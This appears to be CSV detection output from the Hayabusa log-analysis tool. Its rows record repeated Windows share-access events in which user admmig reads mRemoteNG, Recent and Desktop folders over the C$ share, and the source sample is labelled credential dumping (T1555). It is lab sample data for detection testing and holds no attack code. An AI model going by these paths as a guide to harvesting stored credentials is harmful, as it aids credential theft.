2021-12-12 20:53:30.359 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.359 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.359 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.390 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.390 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.390 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.484 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.505 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.523 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.558 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.561 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.561 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\baretail - Shortcut.lnk | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\night.bat | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.641 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
